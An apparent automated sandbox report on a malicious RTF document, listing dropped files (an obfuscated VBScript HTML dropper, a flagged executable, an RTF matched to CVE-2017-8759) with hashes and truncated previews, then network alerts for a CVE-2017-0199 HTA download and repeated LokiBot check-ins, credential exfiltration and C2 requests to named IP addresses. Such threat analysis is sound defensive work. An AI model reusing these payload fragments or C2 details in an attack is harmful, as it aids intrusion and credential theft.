                                                    Preview:L..................F.... ...&...r...&...r...;~S.4;...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....tY.P..user.8......QK.XtY.P*...&=....U...............A.l.b.u.s.....z.1......WE...Desktop.d......QK.X.WE.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....b.2.....tY.P .stthigns.doc..F.......WD..WD.*.........................s.t.t.h.i.g.n.s...d.o.c.......v...............-...8...[............?J......C:\Users\..#...................\\468325\Users.user\Desktop\stthigns.doc.#.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.s.t.t.h.i.g.n.s...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......468325..........D_....3N...W...9..W.e8...8.....[D_....3N...W...9..W.e8...8.....[
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):162
                                                    Entropy (8bit):2.4797606462020307
                                                    Encrypted:false
                                                    SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                    MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                    SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                    SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                    SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                    Malicious:false
                                                    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:HTML document, ASCII text, with very long lines (23388), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):23556
                                                    Entropy (8bit):1.6848932886813717
                                                    Encrypted:false
                                                    SSDEEP:96:C2vy2KJTuvPTTwduJZA6/3P42e2+ip2k+:TLwuv6QP5f+F3
                                                    MD5:EC0D423A3F72D69975A1E31A275F5377
                                                    SHA1:213922FB8456ECAADC24889AFEC1AC6EF5010C68
                                                    SHA-256:9FD433CD543AB161D2A3CCB96A265C79EE0BB1A513647C0C33C72114660C64AC
                                                    SHA-512:8132F567ABFD4E3489204D1F3A9FC8292457CE10495345CD0CCFA8074233411C8305C4D73078A7DEE02B086FBC22B8AD7047DD4BC127DE337D0800771EDF53AD
                                                    Malicious:true
                                                    Preview:<!DOCTYPE html>..<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >..<html>..<body>..<ScRipT LANGuagE="vBscRIpT">..DIm..............................................................................................................................................................................................................................................................................................................................................tzHLdKvsEcRWyQFPNHoyTeRtKqrFUgUlAoRyLWkDbyxAAzslucnYWlBayRmyLBfwwVLvflcYiZZEpfzNUcHCcwlZBMnkhugupWLqSGPRjiRWzLULwlRXTOODbDPFQNUvpSkWIiuwlAwrOtAtidmZdngahQoxtJqNCmFehSLdxChEPdkYlgmxnXjGbbfCAhnKlFqCZNLZaRvxkRURPVoeiRQJQNIGSlJCzyNdRVnAdTGK..............................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):600576
                                                    Entropy (8bit):7.913749036393697
                                                    Encrypted:false
                                                    SSDEEP:12288:VrOj+Ri3AgFdZeDZskwkzA0+7xUNq4KC73vUECPnsSnR83PdB0:xQ3AgSskwZNeEqdCPssS3F
                                                    MD5:66B03D1AFF27D81E62B53FC108806211
                                                    SHA1:2557EC8B32D0B42CAC9CABDE199D31C5D4E40041
                                                    SHA-256:59586E753C54629F428A6B880F6AFF09F67AF0ACE76823AF3627DDA2281532E4
                                                    SHA-512:9F8EF3DD8C482DEBB535B1E7C9155E4AB33A04F8C4F31ADE9E70ADBD5598362033785438D5D60C536A801E134E09FCD1BC80FC7AED2D167AF7F531A81F12E43D
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    Joe Sandbox View:
                                                    • Filename: goodtoseeuthatgreatthingswithentirethingsgreatfor.hta, Detection: malicious, Browse
                                                    • Filename: PO-000041492.docx.doc, Detection: malicious, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:=g..............0...... .......&... ...@....@.. ....................................`..................................&..O....@..|....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...|....@......................@..@.reloc.......`.......(..............@..B.................&......H........6...(...........^................................................(......}.....{....r...p .....o5....{....o7...&*....0...........{......o9.....}........&.....*..................0..t........o.....{.....{....r...p(....o:.......+%.....{.....o....o;.....o......&....X....i2..{.....o<.......&.{....o=........*......+..E..........\b......2.{....oA...*n.(......}......}.....(....*....0...........{....o......3...%..;.o......{....o.....s......{.......o....,ir5..p..o......+...(...
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                    Category:dropped
                                                    Size (bytes):44521
                                                    Entropy (8bit):5.318765253135316
                                                    Encrypted:false
                                                    SSDEEP:384:3T3tHbrN79ozVzEFH3W7RMYhDLsnz4lLk0fBWPRtLLu5i6rGsNAYAXJqskG7:3T3b3W75hDk6k0suHhAZqC7
                                                    MD5:C5F41A54E65910D53E7D1C3239CE09D3
                                                    SHA1:7AB555DF80792E1FE20FF4AD6D9F99C1BD94AFA4
                                                    SHA-256:C660948B383949F255DF9A38D965B9ACA9D9D15F9558BCEBE129DE72BF77BACD
                                                    SHA-512:4D134558986B3A94B52097DA3253B2D807ADD1FE7B16AC21AE22C8C901664FFDC7D73CF83BC7544749D919CA0229E3A4A25606B86422203C4F6187DDF68AEED8
                                                    Malicious:true
                                                    Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\themelang0\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Ro
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):162
                                                    Entropy (8bit):2.4797606462020307
                                                    Encrypted:false
                                                    SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                    MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                    SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                    SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                    SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                    Malicious:false
                                                    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                    Category:dropped
                                                    Size (bytes):44521
                                                    Entropy (8bit):5.318765253135316
                                                    Encrypted:false
                                                    SSDEEP:384:3T3tHbrN79ozVzEFH3W7RMYhDLsnz4lLk0fBWPRtLLu5i6rGsNAYAXJqskG7:3T3b3W75hDk6k0suHhAZqC7
                                                    MD5:C5F41A54E65910D53E7D1C3239CE09D3
                                                    SHA1:7AB555DF80792E1FE20FF4AD6D9F99C1BD94AFA4
                                                    SHA-256:C660948B383949F255DF9A38D965B9ACA9D9D15F9558BCEBE129DE72BF77BACD
                                                    SHA-512:4D134558986B3A94B52097DA3253B2D807ADD1FE7B16AC21AE22C8C901664FFDC7D73CF83BC7544749D919CA0229E3A4A25606B86422203C4F6187DDF68AEED8
                                                    Malicious:false
                                                    Yara Hits:
                                                    • Rule: INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2, Description: detects CVE-2017-8759 weaponized RTF documents., Source: C:\Users\user\Desktop\~WRD0000.tmp, Author: ditekSHen
                                                    Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\themelang0\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Ro
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:modified
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:false
                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                    File type:Rich Text Format data, version 1
                                                    Entropy (8bit):2.34699194550343
                                                    TrID:
                                                    • Rich Text Format (5005/1) 55.56%
                                                    • Rich Text Format (4004/1) 44.44%
                                                    File name:stthigns.doc
                                                    File size:257'200 bytes
                                                    MD5:e6859034a42f217800b6bf0980e93848
                                                    SHA1:8dcb69dcf727b7a7fbfbf6755492990dc51fd192
                                                    SHA256:564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1
                                                    SHA512:778ceefc76571268a7c82c18ec1b6f6661b4f696d2612528b8eb94488383c84c9dba6613cd5b1c715514e64d062d73d28d84395f30dadb4fd2da51cbac372d35
                                                    SSDEEP:3072:sUcN1DaxXp1sAkC5gCQqCv7L5FokmFJcmrmR3D:slruZ1sA55gCQBL5FokmFyCmR3D
                                                    TLSH:9844582AE34F0954DF5597BB434A8A4945FCB33EF34540A139ACA73437ADC2E4A6287C
                                                    File Content Preview:{\rtf1..........{\*\pnaiu472632820 \"}.{\6420395929598_&=)@?=7(@06?3%%'(??-'>`1<.$0'8|`_[.?0]%_.:@&^8..1.|..43?>_96?=?!.%=#?%~/;!+(,#^%`$!!?0?!]%<0-00>)!.43|?6$.?:$#[$.>9:^^&$.*</5~-(,]:^*3<;;7!+5/^.?;$-<(.3.=71[??.86+06;$'845*?<(?6@`!_7?,@;-@&-3%_&-9&$%0
                                                    Icon Hash:2764a3aaaeb7bdbf
                                                    IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                    000001592hno
                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-11-20T11:08:01.107173+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.224916366.63.187.23180TCP
                                                    2024-11-20T11:08:01.107297+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)166.63.187.23180192.168.2.2249163TCP
                                                    2024-11-20T11:08:09.357697+01002022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1166.63.187.23180192.168.2.2249164TCP
                                                    2024-11-20T11:08:09.456799+01002022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2166.63.187.23180192.168.2.2249164TCP
                                                    2024-11-20T11:08:17.124071+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224916594.156.177.4180TCP
                                                    2024-11-20T11:08:17.124071+01002025381ET MALWARE LokiBot Checkin1192.168.2.224916594.156.177.4180TCP
                                                    2024-11-20T11:08:17.124071+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224916594.156.177.4180TCP
                                                    2024-11-20T11:08:17.823731+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.224916594.156.177.4180TCP
                                                    2024-11-20T11:08:17.934139+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224916694.156.177.4180TCP
                                                    2024-11-20T11:08:17.934139+01002025381ET MALWARE LokiBot Checkin1192.168.2.224916694.156.177.4180TCP
                                                    2024-11-20T11:08:17.934139+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224916694.156.177.4180TCP
                                                    2024-11-20T11:08:18.691490+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.224916694.156.177.4180TCP
                                                    2024-11-20T11:08:18.846126+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224916794.156.177.4180TCP
                                                    2024-11-20T11:08:18.846126+01002025381ET MALWARE LokiBot Checkin1192.168.2.224916794.156.177.4180TCP
                                                    2024-11-20T11:08:18.846126+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224916794.156.177.4180TCP
                                                    2024-11-20T11:08:19.578539+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224916794.156.177.4180TCP
                                                    2024-11-20T11:08:19.578539+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224916794.156.177.4180TCP
                                                    2024-11-20T11:08:19.583567+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249167TCP
                                                    2024-11-20T11:08:19.737168+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224916894.156.177.4180TCP
                                                    2024-11-20T11:08:19.737168+01002025381ET MALWARE LokiBot Checkin1192.168.2.224916894.156.177.4180TCP
                                                    2024-11-20T11:08:19.737168+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224916894.156.177.4180TCP
                                                    2024-11-20T11:08:20.483471+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224916894.156.177.4180TCP
                                                    2024-11-20T11:08:20.483471+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224916894.156.177.4180TCP
                                                    2024-11-20T11:08:20.491622+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249168TCP
                                                    2024-11-20T11:08:20.648933+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224916994.156.177.4180TCP
                                                    2024-11-20T11:08:20.648933+01002025381ET MALWARE LokiBot Checkin1192.168.2.224916994.156.177.4180TCP
                                                    2024-11-20T11:08:20.648933+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224916994.156.177.4180TCP
                                                    2024-11-20T11:08:21.399796+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224916994.156.177.4180TCP
                                                    2024-11-20T11:08:21.399796+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224916994.156.177.4180TCP
                                                    2024-11-20T11:08:21.404863+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249169TCP
                                                    2024-11-20T11:08:21.561435+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917094.156.177.4180TCP
                                                    2024-11-20T11:08:21.561435+01002025381ET MALWARE LokiBot Checkin1192.168.2.224917094.156.177.4180TCP
                                                    2024-11-20T11:08:21.561435+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917094.156.177.4180TCP
                                                    2024-11-20T11:08:22.424479+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917094.156.177.4180TCP
                                                    2024-11-20T11:08:22.424479+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917094.156.177.4180TCP
                                                    2024-11-20T11:08:22.431805+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249170TCP
                                                    2024-11-20T11:08:22.587777+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917194.156.177.4180TCP
                                                    2024-11-20T11:08:22.587777+01002025381ET MALWARE LokiBot Checkin1192.168.2.224917194.156.177.4180TCP
                                                    2024-11-20T11:08:22.587777+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917194.156.177.4180TCP
                                                    2024-11-20T11:08:23.353502+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917194.156.177.4180TCP
                                                    2024-11-20T11:08:23.353502+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917194.156.177.4180TCP
                                                    2024-11-20T11:08:23.382907+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249171TCP
                                                    2024-11-20T11:08:23.789922+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917294.156.177.4180TCP
                                                    2024-11-20T11:08:23.789922+01002025381ET MALWARE LokiBot Checkin1192.168.2.224917294.156.177.4180TCP
                                                    2024-11-20T11:08:23.789922+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917294.156.177.4180TCP
                                                    2024-11-20T11:08:24.467559+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917294.156.177.4180TCP
                                                    2024-11-20T11:08:24.467559+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917294.156.177.4180TCP
                                                    2024-11-20T11:08:24.482563+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249172TCP
                                                    2024-11-20T11:08:24.629607+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917394.156.177.4180TCP
                                                    2024-11-20T11:08:24.629607+01002025381ET MALWARE LokiBot Checkin1192.168.2.224917394.156.177.4180TCP
                                                    2024-11-20T11:08:24.629607+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917394.156.177.4180TCP
                                                    2024-11-20T11:08:25.379147+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917394.156.177.4180TCP
                                                    2024-11-20T11:08:25.379147+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917394.156.177.4180TCP
                                                    2024-11-20T11:08:25.387666+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249173TCP
                                                    2024-11-20T11:08:25.550254+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917494.156.177.4180TCP
                                                    2024-11-20T11:08:25.550254+01002025381ET MALWARE LokiBot Checkin1192.168.2.224917494.156.177.4180TCP
                                                    2024-11-20T11:08:25.550254+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917494.156.177.4180TCP
                                                    2024-11-20T11:08:26.297901+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917494.156.177.4180TCP
                                                    2024-11-20T11:08:26.297901+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917494.156.177.4180TCP
                                                    2024-11-20T11:08:26.303597+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249174TCP
                                                    2024-11-20T11:08:26.451548+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917594.156.177.4180TCP
                                                    2024-11-20T11:08:26.451548+01002025381ET MALWARE LokiBot Checkin1192.168.2.224917594.156.177.4180TCP
                                                    2024-11-20T11:08:26.451548+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917594.156.177.4180TCP
                                                    2024-11-20T11:08:27.189211+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917594.156.177.4180TCP
                                                    2024-11-20T11:08:27.189211+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917594.156.177.4180TCP
                                                    2024-11-20T11:08:27.194081+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249175TCP
                                                    2024-11-20T11:08:27.342170+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917694.156.177.4180TCP
                                                    2024-11-20T11:08:27.342170+01002025381ET MALWARE LokiBot Checkin1192.168.2.224917694.156.177.4180TCP
                                                    2024-11-20T11:08:27.342170+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917694.156.177.4180TCP
                                                    2024-11-20T11:08:28.082947+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917694.156.177.4180TCP
                                                    2024-11-20T11:08:28.082947+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917694.156.177.4180TCP
                                                    2024-11-20T11:08:28.097656+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249176TCP
                                                    2024-11-20T11:08:28.290956+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917794.156.177.4180TCP
                                                    2024-11-20T11:08:28.290956+01002025381ET MALWARE LokiBot Checkin1192.168.2.224917794.156.177.4180TCP
                                                    2024-11-20T11:08:28.290956+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917794.156.177.4180TCP
                                                    2024-11-20T11:08:29.023498+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917794.156.177.4180TCP
                                                    2024-11-20T11:08:29.023498+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917794.156.177.4180TCP
                                                    2024-11-20T11:08:29.028327+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249177TCP
                                                    2024-11-20T11:08:29.162280+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917894.156.177.4180TCP
                                                    2024-11-20T11:08:29.162280+01002025381ET MALWARE LokiBot Checkin1192.168.2.224917894.156.177.4180TCP
                                                    2024-11-20T11:08:29.162280+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917894.156.177.4180TCP
                                                    2024-11-20T11:08:29.900412+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917894.156.177.4180TCP
                                                    2024-11-20T11:08:29.900412+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917894.156.177.4180TCP
                                                    2024-11-20T11:08:29.907682+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249178TCP
                                                    2024-11-20T11:08:30.056656+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917994.156.177.4180TCP
                                                    2024-11-20T11:08:30.056656+01002025381ET MALWARE LokiBot Checkin1192.168.2.224917994.156.177.4180TCP
                                                    2024-11-20T11:08:30.056656+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917994.156.177.4180TCP
                                                    2024-11-20T11:08:30.800621+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917994.156.177.4180TCP
                                                    2024-11-20T11:08:30.800621+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917994.156.177.4180TCP
                                                    2024-11-20T11:08:30.805867+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249179TCP
                                                    2024-11-20T11:08:30.942889+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918094.156.177.4180TCP
                                                    2024-11-20T11:08:30.942889+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918094.156.177.4180TCP
                                                    2024-11-20T11:08:30.942889+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918094.156.177.4180TCP
                                                    2024-11-20T11:08:31.709835+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918094.156.177.4180TCP
                                                    2024-11-20T11:08:31.709835+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918094.156.177.4180TCP
                                                    2024-11-20T11:08:31.714780+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249180TCP
                                                    2024-11-20T11:08:31.861944+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918194.156.177.4180TCP
                                                    2024-11-20T11:08:31.861944+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918194.156.177.4180TCP
                                                    2024-11-20T11:08:31.861944+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918194.156.177.4180TCP
                                                    2024-11-20T11:08:32.666766+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918194.156.177.4180TCP
                                                    2024-11-20T11:08:32.666766+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918194.156.177.4180TCP
                                                    2024-11-20T11:08:32.675345+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249181TCP
                                                    2024-11-20T11:08:32.814812+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918294.156.177.4180TCP
                                                    2024-11-20T11:08:32.814812+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918294.156.177.4180TCP
                                                    2024-11-20T11:08:32.814812+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918294.156.177.4180TCP
                                                    2024-11-20T11:08:33.577251+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918294.156.177.4180TCP
                                                    2024-11-20T11:08:33.577251+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918294.156.177.4180TCP
                                                    2024-11-20T11:08:33.582195+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249182TCP
                                                    2024-11-20T11:08:33.725738+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918394.156.177.4180TCP
                                                    2024-11-20T11:08:33.725738+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918394.156.177.4180TCP
                                                    2024-11-20T11:08:33.725738+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918394.156.177.4180TCP
                                                    2024-11-20T11:08:34.478832+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918394.156.177.4180TCP
                                                    2024-11-20T11:08:34.478832+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918394.156.177.4180TCP
                                                    2024-11-20T11:08:34.487728+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249183TCP
                                                    2024-11-20T11:08:34.631910+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918494.156.177.4180TCP
                                                    2024-11-20T11:08:34.631910+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918494.156.177.4180TCP
                                                    2024-11-20T11:08:34.631910+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918494.156.177.4180TCP
                                                    2024-11-20T11:08:35.458425+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918494.156.177.4180TCP
                                                    2024-11-20T11:08:35.458425+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918494.156.177.4180TCP
                                                    2024-11-20T11:08:35.465753+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249184TCP
                                                    2024-11-20T11:08:35.612589+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918594.156.177.4180TCP
                                                    2024-11-20T11:08:35.612589+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918594.156.177.4180TCP
                                                    2024-11-20T11:08:35.612589+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918594.156.177.4180TCP
